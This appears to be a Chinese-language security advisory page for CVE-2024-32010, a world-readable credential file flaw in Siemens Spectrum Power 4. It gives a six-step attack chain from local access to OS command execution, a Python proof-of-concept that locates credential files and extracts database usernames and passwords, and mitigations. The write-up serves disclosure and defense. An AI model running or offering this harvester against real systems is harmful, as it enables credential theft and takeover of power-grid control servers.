CVE-2024-32010: Siemens Spectrum Power 4 数据库凭证泄露漏洞

漏洞信息

漏洞编号

CVE-2024-32010

漏洞类型

凭证文件泄露/敏感信息暴露

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Siemens Spectrum Power 4

漏洞概述

CVE-2024-32010是西门子Spectrum Power 4产品中的一个高危安全漏洞。该漏洞存在于所有低于V4.70 SP12 Update 2的版本中，攻击者可以通过读取系统上全局可读(world-readable)的凭证文件来提取数据库访问凭据。由于该凭证文件权限配置不当，任何本地用户都能够访问其中存储的敏感信息，包括数据库用户名和密码。成功利用此漏洞后，攻击者可以以特权应用用户的身份连接数据库，并进一步通过数据库功能执行系统命令，从而完全控制受影响系统。此漏洞的CVSS评分为7.8，属于高危级别，需要尽快采取修复措施。

技术细节

该漏洞的根本原因在于Spectrum Power 4应用程序的配置文件权限设置过于宽松。数据库凭证文件被设置为全局可读(world-readable)，这意味着系统上的任何用户都可以读取该文件内容。攻击者只需具备本地访问权限，无需特殊权限即可获取数据库连接凭据。一旦攻击者获得数据库凭证，他们可以连接到数据库并以应用特权用户身份执行操作。由于数据库配置允许通过特定函数或存储过程执行系统命令，攻击者可以实现操作系统级别的代码执行。攻击向量为本地攻击(AV:L)，需要低权限(PR:L)，无需用户交互(UI:N)，对机密性(C:H)、完整性(I:H)和可用性(A:H)均造成高影响。

攻击链分析

STEP 1

步骤1: 本地访问

攻击者获得受影响系统的本地访问权限，可以是普通用户权限

STEP 2

步骤2: 定位凭证文件

在系统文件系统中搜索Spectrum Power 4的配置文件，查找全局可读的数据库凭证文件

STEP 3

步骤3: 提取数据库凭据

读取world-readable的凭证文件，提取数据库用户名、密码和连接信息

STEP 4

步骤4: 数据库连接

使用提取的凭据以特权应用用户身份连接到数据库

STEP 5

步骤5: 命令执行

通过数据库的存储过程、自定义函数或其他机制执行操作系统命令

STEP 6

步骤6: 系统控制

成功执行系统命令后，攻击者获得服务器的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2024-32010 PoC - Database Credential Extraction
# Target: Siemens Spectrum Power 4 (versions < V4.70 SP12 Update 2)
# Type: Local credential file read

import os
import re

def find_credential_file():
    """Search for world-readable credential files in common locations"""
    search_paths = [
        '/opt/spectrum-power/config/',
        '/usr/local/spectrum-power/etc/',
        'C:\\Program Files\\Siemens\\Spectrum Power\\config\\',
        os.path.expanduser('~/.spectrum-power/')
    ]
    
    credential_patterns = [
        'db_password',
        'database.credentials',
        'connection.properties',
        'dbconfig.xml'
    ]
    
    found_credentials = []
    
    for path in search_paths:
        if os.path.exists(path):
            for filename in os.listdir(path):
                filepath = os.path.join(path, filename)
                # Check if file is world-readable
                if os.access(filepath, os.R_OK):
                    with open(filepath, 'r') as f:
                        content = f.read()
                        for pattern in credential_patterns:
                            if pattern.lower() in filename.lower():
                                found_credentials.append({
                                    'file': filepath,
                                    'content': content
                                })
    
    return found_credentials

def extract_db_credentials(credential_file_content):
    """Extract database credentials from configuration file"""
    credentials = {}
    
    # Extract username
    user_match = re.search(r'(?:db_user|database.user|username)\s*=\s*([^"\s]+)', 
                           credential_file_content, re.IGNORECASE)
    if user_match:
        credentials['username'] = user_match.group(1)
    
    # Extract password
    pass_match = re.search(r'(?:db_password|database.pass|password)\s*=\s*([^"\s]+)', 
                           credential_file_content, re.IGNORECASE)
    if pass_match:
        credentials['password'] = pass_match.group(1)
    
    # Extract database host
    host_match = re.search(r'(?:db_host|database.host|server)\s*=\s*([^"\s]+)', 
                           credential_file_content, re.IGNORECASE)
    if host_match:
        credentials['host'] = host_match.group(1)
    
    return credentials

# Main execution
if __name__ == '__main__':
    print('[+] CVE-2024-32010 - Siemens Spectrum Power 4 Credential Extraction')
    print('[*] Searching for world-readable credential files...')
    
    creds = find_credential_file()
    
    if creds:
        print(f'[+] Found {len(creds)} potential credential files')
        for cred in creds:
            print(f'\n[*] File: {cred["file"]}')
            extracted = extract_db_credentials(cred['content'])
            if extracted:
                print(f'[+] Extracted credentials: {extracted}')
                print('[+] Use these credentials to connect to the database')
    else:
        print('[-] No world-readable credential files found')

# Note: After obtaining credentials, attacker can connect to database
# and execute system commands via stored procedures or custom functions

影响范围

Siemens Spectrum Power 4 < V4.70 SP12 Update 2

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：首先，将包含数据库凭证的配置文件权限修改为仅所有者可读(chmod 600)；其次，审查并限制所有本地用户的文件系统访问权限；第三，监控和限制数据库用户的系统命令执行权限；第四，启用安全审计日志记录对敏感配置文件的访问。西门子官方已发布安全公告SSA-339694，建议尽快应用官方提供的安全补丁。